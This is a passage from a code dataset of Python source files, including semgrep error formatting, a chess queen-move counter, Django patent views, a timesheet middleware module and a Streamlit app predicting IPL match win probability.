zip(range(start.line, end.line + 1), code_segment):\n snippet.append(f\"{self._format_line_number(part_of_span, line_num)}{line}\")\n return snippet\n\n def __str__(self) -> str:\n return self.short_msg\n\n def format_for_terminal(self) -> str:\n \"\"\"\n Format this exception into a pretty string with context and color\n \"\"\"\n header = f\"{with_color(Colors.red, 'semgrep ' + self.level.to_json())}: {self.short_msg}\"\n snippets = []\n for span in self.spans:\n if span.file != \"semgrep temp file\":\n location_hint = f\" --> {span.file}:{span.start.line}\"\n snippet = [location_hint]\n else:\n snippet = []\n\n # all the lines of code in the file this comes from\n source: List[str] = 
SourceTracker.source(span.source_hash)\n\n # First, print the span from `context_start` to `start`\n # Next, sprint the focus of the span from `start` to `end`\n # If the actual span is only 1 line long, use `column` information to highlight the exact problem\n # Finally, print end context from `end` to `context_end`\n if span.context_start:\n snippet += self._format_code_segment(\n span.context_start, previous_line(span.start), source, span\n )\n snippet += self._format_code_segment(span.start, span.end, source, span)\n # Currently, only span highlighting if it's a one line span\n if span.start.line == span.end.line:\n error = with_color(Colors.red, (span.end.col - span.start.col) * \"^\")\n snippet.append(\n self._format_line_number(span, None)\n + \" \" * (span.start.col - 1)\n + error\n )\n if span.context_end:\n snippet += self._format_code_segment(\n next_line(span.end), span.context_end, source, span\n )\n\n snippets.append(\"\\n\".join(snippet))\n snippet_str = \"\\n\".join(snippets)\n if self.help:\n help_str = f\"= {with_color(Colors.cyan, 'help', bold=True)}: {self.help}\"\n else:\n help_str = \"\"\n\n # TODO remove this when temp files are no longer in error messages\n if snippet_str == \"\":\n snippet_str_with_newline = \"\"\n else:\n snippet_str_with_newline = f\"{snippet_str}\\n\"\n return f\"{header}\\n{snippet_str_with_newline}{help_str}\\n{with_color(Colors.red, self.long_msg or '')}\\n\"\n\n\n@attr.s(frozen=True, eq=True)\nclass InvalidRuleSchemaError(ErrorWithSpan):\n code = RULE_PARSE_FAILURE_EXIT_CODE\n level = out.ErrorSeverity(out.Error_())\n\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.InvalidRuleSchemaError())\n\n\n@attr.s(frozen=True, eq=True)\nclass UnknownLanguageError(ErrorWithSpan):\n code = INVALID_LANGUAGE_EXIT_CODE\n level = out.ErrorSeverity(out.Error_())\n\n def type_(self) -> out.ErrorType:\n return out.ErrorType(out.UnknownLanguageError())\n\n\n# cf. https://stackoverflow.com/questions/1796180/how-can-i-get-a-list-of-all-classes-within-current-module-in-python/1796247#1796247\n# This is used only in join_rules.py\nERROR_MAP = {\n classname: classdef\n for classname, classdef in inspect.getmembers(\n sys.modules[__name__],\n lambda member: inspect.isclass(member) and member.__module__ == __name__,\n )\n}\n","repo_name":"semgrep/semgrep","sub_path":"cli/src/semgrep/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":15709,"program_lang":"python","lang":"en","doc_type":"code","stars":9057,"dataset":"github-code","pt":"48"} +{"seq_id":"35471228945","text":"def printbox(length,width,qx,qy,obstacles,path):\n for x in range(1,length+1):\n for y in range(1,width+1):\n if [x,y] == [qx,qy]:\n print (\" Q \"),\n elif [x,y] in path:\n print(\" $ \"),\n elif [x,y] in obstacles:\n print(\" 8 \"),\n else:\n print(\" . 
\"),\n        print(\"\\n\")\n\ndef findN(n,k,q_x,q_y,obstacles):\n    path = []\n\n    x = q_x\n    y = q_y\n    while x < n :\n        x += 1\n\n        if [x, y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while x > 1:\n        x -= 1\n\n        if [x, y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while y < n:\n        y += 1\n\n        if [x, y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while y > 1:\n        y -= 1\n\n        if [x, y] in obstacles:\n            break\n        path.append([x, y])\n\n\n\n\n    x = q_x\n    y = q_y\n    while x < n and y < n:\n        x += 1\n        y += 1\n        if [x,y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while x > 1 and y > 1:\n        x -= 1\n        y -= 1\n        if [x,y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while x < n and y > 1:\n        x += 1\n        y -= 1\n        if [x,y] in obstacles:\n            break\n        path.append([x, y])\n\n    x = q_x\n    y = q_y\n    while x > 1 and y < n:\n        x -= 1\n        y += 1\n        if [x,y] in obstacles:\n            break\n        path.append([x, y])\n\n    return path\n\n\n\ndef calculateN(n,k,q_x,q_y,obstacle):\n    xp = length-q_x\n    xn = q_x-1\n    yp = length-q_y\n    yn = q_y-1\n    pp = min(length-q_x,length-q_y)\n    pm = min(q_y-1,length-q_x)\n    mp = min(q_x-1,length-q_y)\n    mm = min(q_x-1,q_y-1)\n\n    for [x,y] in obstacle:\n        if x == q_x:\n            if q_y-y-1 < yn and q_y-y-1 >= 0 :\n                yn = q_y-y-1\n\n            if y-q_y-1 < yp and y-q_y-1 >= 0:\n                yp = y-q_y-1\n\n        if y == q_y:\n\n            if q_x - x - 1 < xn and q_x - x - 1 >= 0:\n                xn = q_x - x - 1\n\n            if x - q_x - 1 < xp and x - q_x - 1 >= 0:\n                xp = x - q_x - 1\n\n        if abs(q_x-x) == abs(q_y-y):\n            if q_x < x:\n                if q_y < y:\n                    temp = min(x-q_x,y-q_y)-1\n                    if pp > temp:\n                        pp = temp\n                if q_y > y:\n                    temp = min(x-q_x,q_y-y)-1\n                    if pm > temp:\n                        pm = temp\n\n            elif q_y < y:\n                temp = min(q_x-x,y-q_y)-1\n                if mp > temp:\n                    mp = temp\n\n            elif q_y > y:\n                temp = min(q_x-x,q_y-y)-1\n                if mm > temp:\n                    mm = temp\n\n\n    print(\"pp = \"),\n    print(pp)\n    print(\"mp = \"),\n    print(mp)\n    print(\"pm = \"),\n    print(pm)\n    print(\"mm = \"),\n    print(mm)\n\n    number = xp+xn+yp+yn+pp+mp+pm+mm\n\n    return number\n\n\nlength = 11\nqx = 5\nqy = 5\nobstacles = [[5,1],[5,11],[1,5],[11,5],[5,3],[11,11],[7,7],[1,1],[3,3],[7,3],[3,7]]\npath = []\n\npath = findN(length,len(obstacles),qx,qy,obstacles)\n\nprint(path)\nprint(len(path))\n\nprintbox(length,length,qx,qy,obstacles,path)\n\nprint(calculateN(length,len(obstacles),qx,qy,obstacles))","repo_name":"adhirathan/python","sub_path":"queen.py","file_name":"queen.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"29831581927","text":"# -*- coding: utf-8 -*-#\n# -------------------------------------------------------------------------------\n# Author: A\n# Date: 2020-09-08\n# -------------------------------------------------------------------------------\nfrom fpdf import FPDF\nfrom PIL import Image\nimport os\nimport time\n\n\ndef makePdf(pdfFileName, listPages):\n    \"\"\"图片转PDF\"\"\"\n    maxw_list = []\n    maxh_list = []\n    for one_p in listPages:\n        cover = Image.open(one_p)\n        width, height = cover.size\n        maxh_list.append(height)\n        maxw_list.append(width)\n    try:\n        width_m = max(maxw_list)\n        height_m = max(maxh_list)\n    except:\n        width_m = 2339\n        height_m = 1654\n    pdf = FPDF(unit=\"pt\", format=[width_m, height_m])\n    for page in listPages:\n        pdf.add_page()\n        pdf.image(page, 0, 0)\n    pdf.output(pdfFileName, \"F\")\n\n\nf_path = r'F:\out'\nf_list = os.listdir(f_path)\npp = r'F:\calc'\nfor one_dir in f_list:\n    print(one_dir)\n    pictures_path = os.path.join(f_path, one_dir)\n    out_path = os.path.join(f_path, one_dir + \".pdf\")\n    if os.path.exists(os.path.join(pp, one_dir + \".pdf\")):\n        
print(\"文件已创建\")\n else:\n pictures_list = []\n for roots, dirs, files in os.walk(pictures_path):\n for one_picture in files:\n if str(one_picture).endswith(\"jpg\" or \"png\"):\n sizzz = Image.open(os.path.join(roots, one_picture))\n width, height = sizzz.size\n if width < height:\n pass\n else:\n ak = sizzz.transpose(Image.ROTATE_90)\n ak.save(os.path.join(roots, one_picture))\n one_picture_path = os.path.join(roots, one_picture)\n pictures_list.append(one_picture_path)\n makePdf(out_path, pictures_list)\n","repo_name":"runker54/Project","sub_path":"PDF/image_TO_pdf.py","file_name":"image_TO_pdf.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38952686120","text":"# _*_ coding: utf-8 _*_\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\n\nfrom .models import Patent\nfrom .forms import AddPatentForm, ModifyPatentForm\nfrom operation.models import UserFavorite\n\n\n# Create your views here.\n\nclass PatentListView(View):\n def get(self, request):\n all_patent = Patent.objects.filter(if_show=True)\n field_category = request.GET.get('field_category', '')\n patent_category = request.GET.get('patent_category', '')\n price_down = request.GET.get('price_down', '')\n price_up = request.GET.get('price_up', '')\n\n newest_patent = all_patent.order_by('-add_time')[:10]\n\n # field_categorys = all_patent.values_list('field_category').distinct()\n # FIELD = {\n # '0': u'食品饮料', '1': u'建筑建材', '2': u'家居用品', '3': u'轻工纺织', '4': u'化学化工', '5': u'新能源', '6': u'机械',\n # '7': u'环保和资源', '8': u'橡胶塑料', '9': u'仪器仪表', '10': u'新型材料', '11': u'电子信息', '12': u'医药与医疗',\n # '13': u'农林牧业', '14': u'海洋开发', '15': u'航空航天', '16': u'采矿冶金', '17': u'电气自动化', '18': u'包装印刷',\n # '19': u'教育休闲', '20': u'钒钛产业', '21': u'安全防护', '22': u'交通运输'\n # }\n FIELD = (\n ('0', u'食品饮料'), ('1', u'建筑建材'), ('2', u'家居用品'), ('3', u'轻工纺织'), ('4', u'化学化工'), ('5', u'新能源'),\n ('6', u'机械'),\n ('7', u'环保和资源'), ('8', u'橡胶塑料'), ('9', u'仪器仪表'), ('10', u'新型材料'), ('11', u'电子信息'), ('12', u'医药与医疗'),\n ('13', u'农林牧业'), ('14', u'海洋开发'), ('15', u'航空航天'), ('16', u'采矿冶金'), ('17', u'电气自动化'), ('18', u'包装印刷'),\n ('19', u'教育休闲'), ('20', u'钒钛产业'), ('21', u'安全防护'), ('22', u'交通运输'))\n\n # field_categorys_array = []\n # for field_category in field_categorys:\n # field_categorys_array.append({'key': field_category[0], 'value': FIELD[field_category[0]]})\n\n patent_categorys = all_patent.values_list('patent_category').distinct()\n # PATENT = {\n # 'fmzl': u'发明专利', 'syxxzl': u'实用新型专利', 'wgzl': '外观专利'\n # }\n PATENT = (('fmzl', u'发明专利'), ('syxxzl', u'实用新型专利'), ('wgzl', '外观专利'))\n # patent_categorys_array = []\n # for patent_category in patent_categorys:\n # patent_categorys_array.append({'key': patent_category[0], 'value': PATENT[patent_category[0]]})\n\n if field_category:\n all_patent = all_patent.filter(field_category=field_category)\n if patent_category:\n all_patent = all_patent.filter(patent_category=patent_category)\n if price_down:\n all_patent = all_patent.filter(price__gte=price_down)\n if price_up:\n all_patent = all_patent.filter(price__lte=price_up)\n\n patent_nums = all_patent.count()\n\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n p = Paginator(all_patent, 10, request=request)\n\n patent = p.page(page)\n\n # patents = patent.object_list\n # patents_=[]\n\n for patent_ in 
patent.object_list:\n patent_.has_fav = False\n if request.user.is_authenticated:\n if UserFavorite.objects.filter(user=request.user, fav_id=patent_.id, fav_type=1):\n patent_.has_fav = True\n # patents_.append(patent_)\n #\n # patent.object_list = patents_\n\n return render(request, 'patent-list.html', {\n 'current_page': 'patent',\n 'newest_patent': newest_patent,\n 'all_patent': patent,\n 'patent_nums': patent_nums,\n 'field_category_id': field_category,\n 'patent_category_id': patent_category,\n 'price_down': price_down,\n 'price_up': price_up,\n 'field_categorys': FIELD,\n 'patent_categorys': PATENT\n })\n\n\nclass PatentDetailView(View):\n def get(self, request, patent_id):\n # 此处的id为表默认为我们添加的值。\n patent = Patent.objects.get(id=int(patent_id))\n # 增加专利点击数\n patent.click_num += 1\n patent.save()\n\n # 是否收藏\n has_fav_patent = False\n\n # 必须是用户已登录我们才需要判断。\n if request.user.is_authenticated:\n if UserFavorite.objects.filter(user=request.user, fav_id=patent.id, fav_type=1):\n has_fav_patent = True\n # 取出标签找到标签相同的patent\n keyword = patent.keyword\n if keyword:\n # 从1开始否则会推荐自己\n relate_patents = Patent.objects.filter(keyword=keyword)[1:2]\n else:\n relate_patents = []\n return render(request, \"patent-detail.html\", {\n 'current_page': 'patent',\n \"patent\": patent,\n \"relate_patents\": relate_patents,\n \"has_fav_patent\": has_fav_patent,\n })\n\n\nclass AddPatentView(View):\n def post(self, request):\n add_patent_form = AddPatentForm(request.POST)\n if add_patent_form.is_valid():\n patent = add_patent_form.save(commit=False)\n patent.seller = request.user\n patent.save()\n return HttpResponse(\n '{\"status\":\"success\"}',\n content_type='application/json')\n else:\n # 通过json的dumps方法把字典转换为json字符串\n return HttpResponse(\n json.dumps(\n add_patent_form.errors),\n content_type='application/json')\n\n\nclass ModifyView(View):\n def post(self, request):\n patent_id = request.POST.get('patent_id', 0)\n patent = Patent.objects.get(id=int(patent_id))\n modify_patent_form = ModifyPatentForm(request.POST, instance=patent)\n if modify_patent_form.is_valid():\n modify_patent_form.save()\n return HttpResponse(\n '{\"status\":\"success\"}',\n content_type='application/json')\n else:\n # 通过json的dumps方法把字典转换为json字符串\n return HttpResponse(\n json.dumps(\n modify_patent_form.errors),\n content_type='application/json')\n\n def get(self, request, patent_id):\n # 此处的id为表默认为我们添加的值。\n patent = Patent.objects.get(id=int(patent_id))\n return render(request, \"usercenter-publish-modify.html\", {\n \"patent\": patent\n })\n","repo_name":"kingvern/txplatform","sub_path":"apps/patent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16498927859","text":"'''\nIs Unique: Implement an algorithm to determine if a string has all unique characters. 
What if you\ncannot use additional data structures?\nHints: #44, #117, #132 \n\n'''\n'''\nPS: Assuming String to be 256 unicoded\n'''\nfrom unicodedata import name\n\n\ndef is_Unique(string):\n \n #edge case\n if (len(string) == 1):\n return True\n \n unique_char = [False] * 256\n\n for char in string:\n if(unique_char[ord(char)] == False):\n unique_char[ord(char)] = True\n else:\n return False\n \n return True\n\nif __name__ == '__main__':\n str1 = input(\"Enter String >> \")\n answer = is_Unique(str1.strip())\n print(answer)","repo_name":"Harshadjoshi01/Cracking_The_Coding_Interview_With_Python","sub_path":"Arrays_And_Strings/Is_Unique.py","file_name":"Is_Unique.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71148527185","text":"import datetime\nfrom functools import partial\n\nimport numpy as np\nimport pandas as pd\n\nfrom middleware.base_table import (\n BaseTable,\n EMPLOYEE_NAME,\n PROJECT_NUMBER,\n SIMPLICATE_ID,\n MONEY,\n HOURS,\n)\nfrom middleware.employee import Employee\nfrom middleware.middleware_utils import singleton, panic\nfrom model.caching import cache\nfrom model.utilities import Period, Day\nfrom sources.simplicate import simplicate, flatten_hours_data, calculate_turnover\n\n\n@singleton\nclass Timesheet(BaseTable):\n def __init__(self):\n super().__init__()\n self.table_name = \"timesheet\"\n self.table_definition = f\"\"\"\n day VARCHAR(10) NOT NULL,\n week INTEGER NOT NULL,\n year INTEGER NOT NULL,\n employee {EMPLOYEE_NAME} NOT NULL,\n\n project_number {PROJECT_NUMBER} NOT NULL,\n\n service_id {SIMPLICATE_ID} NOT NULL,\n revenue_group VARCHAR(40) NOT NULL,\n\n tariff {MONEY} NOT NULL,\n\n type VARCHAR(10) NOT NULL,\n label VARCHAR(100) NOT NULL,\n\n hours {HOURS} NOT NULL,\n turnover {MONEY} NOT NULL,\n corrections {HOURS} NOT NULL,\n corrections_value {MONEY} NOT NULL,\n \n created_at DATETIME NOT NULL,\n \"\"\"\n self.primary_key = \"day, employee, service_id, label\"\n self.index_fields = (\n \"day employee project_number type updated year__week created_at\"\n )\n self.service_dict = (\n None # Hash table of all services. 
Used to lookup extra service data\n )\n # try:\n # self.db.execute(f\"CREATE INDEX timesheet_year_week ON timesheet (year,week)\")\n # except OperationalError:\n # pass # index already existent\n\n def get_service_dict(self):\n if not self.service_dict:\n sim = simplicate()\n services = sim.service()\n self.service_dict = {s[\"id\"]: s for s in services}\n return self.service_dict\n\n def update(self, day=None, only_this_day=False):\n \"\"\"Updates all timesheet entries starting with day if provided,\n 14 days before the latest entry if day is not provided\n or 1-1-2021 if there was no last entry.\"\"\"\n\n # Find the newest day in database\n if not day:\n newest_result = self.db.first(\"select max(day) as day from timesheet\")[\n \"day\"\n ]\n if newest_result:\n day = Day(newest_result).plus_days(-14)\n else:\n day = Day(2021, 1, 1)\n today = Day()\n while day < today:\n self.db.execute(f'delete from timesheet where day = \"{day}\"')\n data_func = partial(self.get_day_data, day, self.get_service_dict())\n self.insert_dicts(data_func)\n day = day.next()\n if only_this_day:\n break\n self.correct_revenue_groups()\n self.correct_fixed_price()\n\n def correct_revenue_groups(self):\n self.db.execute(\n \"\"\"\n update timesheet set revenue_group=\"Omzet teampropositie\" where project_number in (\"BEN-1\",\"VHC-1\",'EASY-6');\n update timesheet set revenue_group=\"Omzet productpropositie\" \n where revenue_group in (\"Omzet development\",\"Omzet app development\");\n update timesheet set revenue_group=\"Omzet Travelbase\" \n where project_number like \"TRAV-%\" or project_number=\"TOR-3\";\n update timesheet set revenue_group=\"Omzet productpropositie\" where project_number in (\"SLIM-30\",\"THIE-17\",'VERH-1','TER-2');\n update timesheet set revenue_group='Omzet teampropositie' where project_number like \"COL-%\";\n update timesheet set revenue_group=\"\" \n where project_number like \"OBE-%\" or project_number like \"QIKK-%\" or label=\"Internal\";\n update timesheet set revenue_group=\"Omzet productpropositie\" \n where revenue_group=\"\" and project_number not like \"OBE-%\";\n update timesheet set revenue_group=\"Omzet overig\" where project_number like \"CAP-%\";\n update timesheet set revenue_group=\"\" where type in (\"leave\",\"absence\");\n update timesheet set revenue_group='Omzet service' where project_number='MANA-6';\n \"\"\"\n )\n self.db.commit()\n\n def correct_fixed_price(self):\n calculate_hourly_rates_query = \"\"\"\n select s.service_id, \n if(s.status='open', LEAST(price/sum(hours+corrections),100), price/sum(hours+corrections)) as hourly_rate \n from timesheet t\n join service s on s.service_id=t.service_id\n where invoice_method='FixedFee'\n group by s.service_id\n having hourly_rate>0\"\"\"\n for rec in self.db.query(calculate_hourly_rates_query):\n self.db.execute(\n f\"\"\"\n update timesheet \n set tariff={rec['hourly_rate']}, turnover=(hours+corrections) * {rec['hourly_rate']} \n where service_id=\"{rec['service_id']}\" \"\"\"\n )\n self.db.commit()\n\n def get_data(self):\n day = Day(2021, 1, 1)\n today = Day()\n while day < today:\n for data in self.get_day_data(day, self.get_service_dict()):\n yield data\n day = day.next() # Move to the next day before repeating the loop\n\n def get_day_data(self, day: Day, services: dict):\n sim = simplicate()\n\n print(\"retrieving\", day)\n data = sim.hours({\"day\": day})\n if data:\n flat_data = flatten_hours_data(data)\n grouped_data = group_by_daypersonservicelabel(flat_data)\n for te in grouped_data:\n yield 
complement_timesheet_data(te, services) # %(name)s\n\n @staticmethod\n def where_clause(\n period: Period, only_clients=0, only_billable=0, users=None, hours_type=None\n ):\n query = f'where day>=\"{period.fromday}\"'\n if period.untilday:\n query += f' and day<\"{period.untilday}\"'\n if hours_type:\n query += f' and type=\"{hours_type}\"'\n\n if only_clients:\n query = (\n \" join project on project.project_number=timesheet.project_number \"\n + query\n + ' and organization not in (\"Oberon\", \"Qikker Online B.V.\") '\n )\n if users:\n if isinstance(users, str):\n users = (users,) # make it a tuple\n users_string = '(\"' + '\",\"'.join(users) + '\")'\n query += f\" and employee in {users_string}\"\n else:\n employees = Employee()\n interns = employees.interns()\n query += f\"\"\" and employee not in (\"{'\",\"'.join(interns)}\")\"\"\"\n if only_billable:\n query += \" and tariff > 0\"\n\n return query\n\n def count(self):\n return self.db.execute(\"select count(*) as aantal from timesheet\")[0][\"aantal\"]\n\n def geboekte_uren(\n self, period, users=None, only_clients=0, only_billable=0\n ) -> float:\n\n query = self.where_clause(\n period,\n users=users,\n only_clients=only_clients,\n only_billable=only_billable,\n hours_type=\"normal\",\n )\n if only_billable:\n query = \"select sum(hours+corrections) as result from timesheet \" + query\n else:\n query = \"select sum(hours) as result from timesheet \" + query\n result = float(self.db.first(query)[\"result\"] or 0)\n return result\n\n def geboekte_omzet(\n self, period, users=None, only_clients=0, only_billable=0\n ) -> float:\n query = self.where_clause(\n period,\n users=users,\n only_clients=only_clients,\n only_billable=only_billable,\n hours_type=\"normal\",\n )\n query = \"select sum(turnover) as result from timesheet \" + query\n query_result = self.db.first(query)\n result = float(query_result[\"result\"] or 0)\n return result\n\n def normal_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type normal in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"normal\", employees)\n\n def leave_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type leave in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"leave\", employees)\n\n def absence_hours(self, period: Period, employees: list = []):\n \"\"\"Number of hours with the type absence in Period. Filtering on employees is optional.\"\"\"\n return self.hours_with_type(period, \"absence\", employees)\n\n def hours_with_type(self, period: Period, hours_type: str, employees: list = []):\n \"\"\"Logged hours with the given type (normal, absence, leave) in Period. 
Filtering on employees is optional.\"\"\"\n query = \"select sum(hours) as result from timesheet \" + self.where_clause(\n period, users=employees, hours_type=hours_type\n )\n query_result = self.db.first(query)\n result = float(query_result[\"result\"] or 0)\n return result\n\n def parameterized_query(\n self, period: Period, where: str = \"\", sort=None, with_project_data=False\n ):\n if with_project_data:\n query_string = f\"\"\"SELECT t.*, p.organization, p.project_name, p.pm, p.status as project_status \n FROM timesheet t JOIN project p ON p.project_number=t.project_number\"\"\"\n else:\n query_string = \"SELECT * from timesheet\"\n query_string += f' WHERE day>=\"{period.fromday}\"'\n if period.untilday:\n query_string += f' AND day<\"{period.untilday}\"'\n if where:\n query_string += \" AND \" + where\n if sort:\n if not isinstance(sort, list):\n sort = [sort]\n query_string += \" ORDER BY \" + \",\".join(sort)\n yield from self.db.query(query_string)\n\n def full_query(self, query_string):\n yield from self.db.query(query_string)\n\n # def services_with_their_hours_and_turnover(\n # self,\n # service_ids: list,\n # day: Day,\n # ) -> dict[str, tuple[float, int]]:\n # \"\"\"Dict with the given service_ids as keys and their turnovers up to the given day as values\"\"\"\n # services_string = '(\"' + '\",\"'.join(service_ids) + '\")'\n # query = f\"\"\"select service_id, sum(hours) as hours, sum(turnover) as turnover from timesheet\n # where service_id in {services_string} and day<=\"{day}\"\n # group by service_id\"\"\"\n # result = {\n # r[\"service_id\"]: (float(r[\"hours\"]), int(r[\"turnover\"]))\n # for r in self.full_query(query)\n # }\n # return result\n\n def netwerk_uren(self, period: Period):\n query = f\"\"\"select sum(hours) as hours from timesheet \n where label='Netwerken' and day>='{period.fromday}' \"\"\"\n if period.untilday:\n query += f\"\"\" and day<='{period.untilday}' \"\"\"\n return self.db.first(query)[\"hours\"]\n\n\ndef group_by_daypersonservicelabel(list_of_dicts):\n df = pd.DataFrame(list_of_dicts)\n\n def first(x):\n return x.values[0]\n\n key = [\"day\", \"employee\", \"service_id\", \"label\"]\n agg = {colname: first for colname in df.columns if colname not in key}\n agg[\"hours\"] = np.sum\n agg[\"corrections\"] = np.sum\n df2 = df.groupby(key).agg(agg).reset_index()\n return df2.to_dict(\"records\")\n\n\ndef complement_timesheet_data(timesheet_entry, services_dict):\n def week_and_year(day_str):\n week = datetime.datetime.strptime(day_str, \"%Y-%m-%d\").isocalendar()[1]\n year = int(day_str[:4])\n if day_str[5] < \"1\" and week > 50:\n year -= 1\n return week, year\n\n del timesheet_entry[\"project_id\"]\n del timesheet_entry[\"hours_id\"]\n del timesheet_entry[\"billable\"]\n del timesheet_entry[\"status\"]\n if not timesheet_entry[\"tariff\"] and (\n timesheet_entry[\"employee\"] not in Employee().interns()\n ):\n timesheet_entry[\"tariff\"] = timesheet_entry[\"service_tariff\"]\n del timesheet_entry[\"service_tariff\"]\n timesheet_entry[\"turnover\"] = calculate_turnover(timesheet_entry)\n del timesheet_entry[\n \"service\"\n ] # Wordt nog gebruikt in calculate_turnover maar mag nu weg\n timesheet_entry[\"week\"], timesheet_entry[\"year\"] = week_and_year(\n timesheet_entry[\"day\"]\n )\n timesheet_entry[\"corrections_value\"] = (\n timesheet_entry[\"corrections\"] * timesheet_entry[\"tariff\"]\n )\n\n # Find the revenue group\n timesheet_entry[\"revenue_group\"] = \"\"\n service = services_dict.get(timesheet_entry[\"service_id\"])\n if service:\n 
revenue_group = service.get(\"revenue_group\")\n if revenue_group:\n timesheet_entry[\"revenue_group\"] = revenue_group[\"label\"]\n\n # De volgende is omdat in 2021 de indeling nog niet goed was\n if (\n timesheet_entry[\"type\"] == \"absence\"\n and timesheet_entry[\"label\"] == \"Feestdagenverlof / National holidays leave\"\n ):\n timesheet_entry[\"type\"] = \"leave\"\n return timesheet_entry\n\n\n@cache(hours=4)\ndef hours_dataframe(period: Period):\n timesheet = Timesheet()\n list_of_dicts = timesheet.parameterized_query(period, with_project_data=True)\n if not list_of_dicts:\n panic(\"hours_dataframe is empty for period\", period)\n df = pd.DataFrame(list_of_dicts)\n df.tariff = df.tariff.astype(float)\n df.hours = df.hours.astype(float)\n df.turnover = df.turnover.astype(float)\n df.corrections = df.corrections.astype(float)\n df.corrections_value = df.corrections_value.astype(float)\n return df\n\n\nif __name__ == \"__main__\":\n timesheet_table = Timesheet()\n timesheet_table.update(Day(\"2021-01-01\"), only_this_day=False)\n # timesheet_table.hours_with_type(\n # Period(\"2022-04-26\", \"2022-04-28\"), hours_type=\"leave\"\n # )\n # pass\n # timesheet_table.repopulate()\n #\n # timesheet_table.correct_revenue_groups()\n # timesheet_table.correct_fixed_price()\n","repo_name":"hpharmsen/dashboard-static","sub_path":"middleware/timesheet.py","file_name":"timesheet.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23389190699","text":"import streamlit as st\nimport pandas as pd\nimport pickle\nteams = ['Royal Challengers Bangalore',\n 'Kings XI Punjab',\n 'Mumbai Indians',\n 'Kolkata Knight Riders',\n 'Rajasthan Royals',\n 'Chennai Super Kings',\n 'Sunrisers Hyderabad',\n 'Delhi Capitals']\n\ncity_names = ['Bangalore', 'Mumbai', 'Delhi', 'Indore', 'Nagpur', 'Ahmedabad',\n 'Chandigarh', 'Hyderabad', 'Cuttack', 'Jaipur', 'Sharjah',\n 'Kolkata', 'Pune', 'Chennai', 'Abu Dhabi', 'Dubai',\n 'Visakhapatnam', 'Raipur', 'Bengaluru', 'Dharamsala', 'Ranchi']\n\npipe = pickle.load(open('pipe.pkl','rb'))\nst.markdown(\"
<h1>IPL Win Probability</h1>
\", unsafe_allow_html=True)\n\ncol1,col2 = st.columns(2)\nwith col1:\n batting_team = st.selectbox('Select Batting Team',sorted(teams))\nwith col2:\n bowling_team = st.selectbox('Select Bowling Team',sorted(teams))\n\nif batting_team == bowling_team :\n st.error('Choose diffrent teams')\n\ncity = st.selectbox('Select city',sorted(city_names))\ntarget = st.number_input('Target')\n\ncol1,col2,col3 = st.columns(3)\nwith col1 :\n score = st.number_input('Score')\nwith col2 :\n wickets = st.number_input('Wickets')\nwith col3 :\n overs = st.number_input('Overs completed ')\n\nif st.button('Predict Probability'):\n runs_left = target - score\n wickets = 10 - wickets\n balls_left = 120 -(overs*6)\n current_run_rate = score/overs\n req_run_rate = (runs_left*6)/balls_left\n\n df = pd.DataFrame({'batting_team':[batting_team],'bowling_team':[bowling_team],'city':[city],'runs_left':[runs_left],'balls_left':[balls_left],'wickets':[wickets],\n 'current_run_rate':[current_run_rate],'req_run_rate':[req_run_rate],'total_runs_x':[target]})\n\n result = pipe.predict_proba(df)\n loss = result[0][0]\n win = result[0][1]\n st.header(batting_team + ' ' + str(round(win*100))+'%')\n st.header(bowling_team + ' '+ str(round(loss*100))+'%')\n\n\n","repo_name":"devrahul9119/Ipl-match-winning-probability","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24144698720","text":"import sys\nimport socket\ncom = socket.gethostname()\nif com in ('piai-Precision-7920-Tower', 'Normalistui-MacBookPro.local'):\n this_file_name = sys._getframe().f_code.co_filename\n sys.stdin = open(f\"{this_file_name[:-3]}.txt\", \"r\")\n\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n\n print(f\"#{test_case}\")\n","repo_name":"Normalist-K/algorithm","sub_path":"study/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31577050302","text":"from django.http import HttpResponse\nfrom django.conf import settings\nfrom django.views.decorators.http import require_POST\n\nfrom app.models import Athlete\nfrom .utils.getPolyline import getStreamsFromPolyline\nfrom .utils.getLaps import getDeviceLaps, getAutoLaps, getSkiRuns\nfrom .graphs.paceElevGraph import paceElevGraph\nfrom .graphs.model3DGraph import model3DGraph\nfrom .graphs.mapThumbnailGraph import mapThumbnail\nfrom .graphs.annotatedMap import annotatedMap\nfrom .graphs.paceZonesGraph import paceZonesGraph\nfrom .graphs.skiSpeedZonesGraph import skiSpeedZonesGraph\nfrom .graphs.gradeZonesGraph import gradeZonesGraph\nfrom 